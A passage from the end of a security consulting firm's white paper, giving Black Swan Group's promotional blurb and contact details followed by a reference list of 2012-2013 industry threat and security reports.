management, and assurance.
Having been involved in numerous integration projects around the globe, we
understand technology alone is not the answer. People, process and technology
are essential ingredients for secure and streamlined operations, and we have a
deep understanding of the issues surrounding all three.
We “sweat the small stuff” with meticulous attention to detail to ensure a solution
is both comprehensive and sound. As this paper indicates, one of our key
strengths is our ability to conceptualise extremely complex issues and distil them
into streamlined strategies for protection that work in practice.
With decades of experience around the globe in a wide range of information
technology and risk management functions, we know what works and what
doesn’t.
Black Swan Group
Phone: 1300 558 451
Email: [email protected]
Website: www.blackswangroup.com.au
11.0 References
Major threat and security reports consulted and quoted in this report are listed
below. Direct quotes in this paper from these sources are referenced by source
name. Other sources consulted are referenced in footnotes throughout the paper.
1. AKAMAI: State of the Internet Report, Q4 2012
2. ANTI: Anti-Phishing Working Group, Phishing Activity Trends Report Q1 2012
3. Arbor: Worldwide Infrastructure Security Report Volume XIII 2012
4. CERT_AU: Cyber Crime & Security Survey Report 2012, CERT Australia and Centre for Internet Safety, University of Canberra
5. Check Point: Security Report 2013
6. Cisco: Annual Security Report 2013
7. Deloitte: Technology, Media, and Telecommunications (TMT) Global Security Study 2013
8. ENISA: Threat Landscape Report, January 2013
9. E&Y: Ernst & Young’s Global Information Security Survey 2012
10. ISACA: E&Y/ISACA, Responding to Targeted Cyberattacks Report 2013
11. Forrester: The State of Data Security and Privacy: 2012 To 2013
12. IBM: X-Force Trend & Risk Report 2012
13. ISO/IEC 15408-1: Information technology, Security techniques, Evaluation criteria for IT security, Part 1: Introduction and general model
14. Mandiant: APT1, Exposing One of China’s Cyber Espionage Units, March 2013
15. Norton: Cybercrime Report 2012
16. NSS_1: NSS Labs, Vulnerability Threat Trends 2013
17. NSS_2: NSS Labs, Cybercrime Kill Chain vs Defence Effectiveness, November 2012
18. NSS_3: NSS Labs, Modelling Exploit Evasions in Layered Security, December 2012
19. O-ESA: Open Enterprise Security Architecture, The Open Group
20. Ponemon: IBM and Ponemon, The Source of Greatest Risk to Sensitive Data, February 2012
21. Prolexic: Quarterly Global DDoS Attack Report, Q1 2013
22. PWC: Key Findings from the PWC Global State of Information Security Survey 2013
23. RSA: The Current State of Cybercrime 2013
24. SBIC: Information Security Shake-up, Disruptive Innovations to Test Security’s Mettle in 2013
25. Secunia: Vulnerability Review 2013
26. Sophos: Security Threat Report 2013
27. Symantec: Internet Security Threat Report, Vol 18, 2013
28. Sym_Supp: Symantec Internet Security Threat Report Supplementary Data, Vol 18, 2013
29. Trustwave: Global Security Report 2013
30. Verizon: Data Breach Investigations Report 2013